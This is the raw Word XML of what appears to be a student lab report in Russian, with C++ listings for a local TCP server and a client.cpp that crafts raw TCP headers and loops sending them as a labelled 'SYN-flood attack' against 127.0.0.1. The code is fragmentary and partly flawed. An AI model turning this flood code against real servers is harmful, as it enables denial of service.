server_sa;</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server_sa.sin_family = AF_INET;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server_sa.sin_port = htons(8000);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server_sa.sin_addr.s_addr = inet_addr("127.0.0.1");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(bind(socket_descr, (struct sockaddr *)&amp;server_sa, sizeof(server_sa)) == -1)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handle_error_en(-1, "bind");</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return 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(listen(socket_descr, LISTEN_BACKLOG) == -1)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handle_error_en(-1, "listen");</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return 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int client_count =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std::string server_addr = inet_ntoa(server_sa.sin_addr);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in_port_t server_port = server_sa.sin_port;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std::cout &lt;&lt; "Server started."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std::cout &lt;&lt; "Host: " &lt;&lt; server_addr &lt;&lt; ":" &lt;&lt; server_port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while (true)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struct sockaddr_in client_sa;</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socklen_t peer_addr_size = sizeof(struct sockaddr_in);</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int sck = accept(socket_descr, (struct sockaddr *)&amp;client_sa, (socklen_t *)&amp;peer_addr_size);</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std::string client_addr = inet_ntoa(client_sa.sin_addr);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in_port_t client_port = client_sa.sin_port;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if (!is_connected &amp;&amp; sck != -1) {</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sock_client = sck;</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std::cout &lt;&lt; "New client connection: " &lt;&lt; client_addr &lt;&lt; ":" &lt;&lt; client_port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pthread_t thread;</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pthread_create(&amp;thread, &amp;attr, server_receive, NULL);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is_connected = true;</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std::cout &lt;&lt; "Client count: " &lt;&lt; ++client_count &lt;&lt; std::endl;</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ab/>
        <w:t>fflush(stdout);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err = pthread_attr_destroy(&amp;attr);</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(err !=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handle_error_en(err, "pthread_attr_destroy");</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if (close(socket_descr) == -1)</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ab/>
        <w:t>handle_error_en(-1, "close");</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ab/>
        <w:t>return 0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="both"/>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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Файл</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>client.cpp</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&lt;arpa/inet.h&gt;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&lt;netinet/in.h&gt;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&lt;netinet/ip.h&gt;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&lt;netinet/tcp.h&gt;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&lt;pthread.h&gt;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&lt;string.h&gt;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&lt;sys/socket.h&gt;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&lt;unistd.h&gt;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&lt;atomic&gt;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&lt;iostream&gt;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&lt;memory&gt;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#include "libs/utils.cpp"</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void* receive(void* arg)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char msg[256];</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ct =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(true)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err = recv(*(int*)arg, msg, 255,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(err &gt; 0)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msg[255] =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std::cout &lt;&lt; msg;</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(ct &gt; 2000)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(err == 0)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(err == -1)</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handle_error_en(-1, "recv");</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pthread_exit(0);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int main(int argc, char **argv)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char datagram[4096], source_ip[32];</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strcpy(source_ip, "127.0.0.1");</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memset(datagram, 0, 4096);</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struct sockaddr_in sin;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sin.sin_family = AF_INET;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sin.sin_port = htons(8000);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sin.sin_addr.s_addr = inet_addr(source_ip);</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auto iph = fillIPHeader(datagram, source_ip, sin);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auto tcph = fillTCPHeader(datagram);</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tcph-&gt;ack =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auto psh = fillFakeHeader(source_ip, sin);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memcpy(&amp;psh.tcp, tcph, sizeof(struct tcphdr));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std::cout &lt;&lt; psh.tcpLength &lt;&lt; std::endl;</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tcph-&gt;check = checksum((unsigned short *)&amp;psh, sizeof(struct FakeHeader));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system("clear");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pthread_attr_t attr;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int err = pthread_attr_init(&amp;attr);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if (err !=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b/>
        <w:t>handle_error_en(err, "pthread_attr_init");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int socket_descr = socket(AF_INET, SOCK_STREAM,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if (socket_descr == -1)</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b/>
        <w:t>handle_error_en(-1, "socket");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struct sockaddr_in server_sa;</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server_sa.sin_family = AF_INET;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server_sa.sin_port = htons(8000);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server_sa.sin_addr.s_addr = inet_addr(source_ip);</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std::cout &lt;&lt; "Press Enter to start SYN-flood attack..." &lt;&lt; std::endl;</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std::cin.ignore();</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if (connect(socket_descr, (struct sockaddr *)&amp;server_sa, sizeof(server_sa)) == -1)</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b/>
        <w:t>handle_error_en(-1, "connect");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pthread_t thread;</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err = pthread_create(&amp;thread, &amp;attr, receive, &amp;socket_descr);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if (err !=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b/>
        <w:t>handle_error_en(err, "pthread_create");</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while (true) {</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ab/>
        <w:t>send(socket_descr, datagram, strlen(datagram), 0);</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ab/>
        <w:t>close(socket_descr);</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rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc157471312"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ПРИЛОЖЕНИЕ Б</w:t>
        <w:br/>
        <w:t>(обязательное)</w:t>
        <w:br/>
        <w:t>Блок-схема алгоритма</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="613F9364">
                <wp:extent cx="5939790" cy="3744595"/>
                <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
                <wp:docPr id="4"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5939640" cy="3744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0pt;margin-top:-295.55pt;width:467.65pt;height:294.8pt;mso-wrap-style:none;v-text-anchor:middle;mso-position-vertical:top" wp14:anchorId="613F9364" type="_x0000_t75">
                <v:imagedata r:id="rId5" o:detectmouseclick="t"/>
                <v:stroke color="#3465a4" joinstyle="round" endcap="flat"/>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference w:type="default" r:id="rId7"/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:left="1701" w:right="851" w:gutter="0" w:header="0" w:top="1134" w:footer="709" w:bottom="153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2360836"/>
    </w:sdtPr>
    <w:sdtContent>
      <w:p>
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="right"/>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suff w:val="space"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>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157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ff17f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Style12" w:customStyle="1">
    <w:name w:val="Текст выноски Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BalloonText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="002e2c23"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Style13" w:customStyle="1">
    <w:name w:val="Верхний колонтитул Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00a42e8a"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Style14" w:customStyle="1">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00a42e8a"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="InternetLink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00e74a5c"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="1" w:customStyle="1">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00ff17fc"/>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ff17fc"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="" w:cs="" w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLKeyboard">
    <w:name w:val="HTML Keyboard"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00456fd6"/>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b7730"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:fill="E1DFDD" w:val="clear"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Style15" w:customStyle="1">
    <w:name w:val="Рисунок Знак"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Style16"/>
    <w:qFormat/>
    <w:rsid w:val="00a32d85"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Microsoft Sans Serif" w:cs="Microsoft Sans Serif"/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="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2"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002e2c2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3"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00a42e8a"/>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f17fc"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents2">
    <w:name w:val="TOC 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00745238"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="708"/>
        <w:tab w:val="right" w:pos="9345" w:leader="dot"/>
      </w:tabs>
      <w:spacing w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Contents1">
    <w:name w:val="TOC 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002317cb"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="708"/>
        <w:tab w:val="right" w:pos="9344" w:leader="dot"/>
      </w:tabs>
      <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="0041757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Style16" w:customStyle="1">
    <w:name w:val="Рисунок"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Style15"/>
    <w:qFormat/>
    <w:rsid w:val="00a32d85"/>
    <w:pPr>
      <w:widowControl w:val="false"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="708"/>
        <w:tab w:val="left" w:pos="4536" w:leader="none"/>
      </w:tabs>
      <w:suppressAutoHyphens w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Microsoft Sans Serif" w:cs="Microsoft Sans Serif"/>
      <w:color w:val="000000"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="ru-RU" w:bidi="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microsoft.com/office/2007/relationships/hdphoto" Target="media/hdphoto1.wdp"/><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LibreOffice/7.3.7.2$Linux_X86_64 LibreOffice_project/30$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>13</Pages>
  <Words>1004</Words>
  <Characters>7324</Characters>
  <CharactersWithSpaces>8460</CharactersWithSpaces>
  <Paragraphs>225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2024-03-22T10:09:00Z</dcterms:created>
  <dc:creator>Denis Konchik</dc:creator>
  <dc:description/>
  <dc:language>en-GB</dc:language>
  <cp:lastModifiedBy/>
  <cp:lastPrinted>2023-09-14T21:26:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-22T17:52:34Z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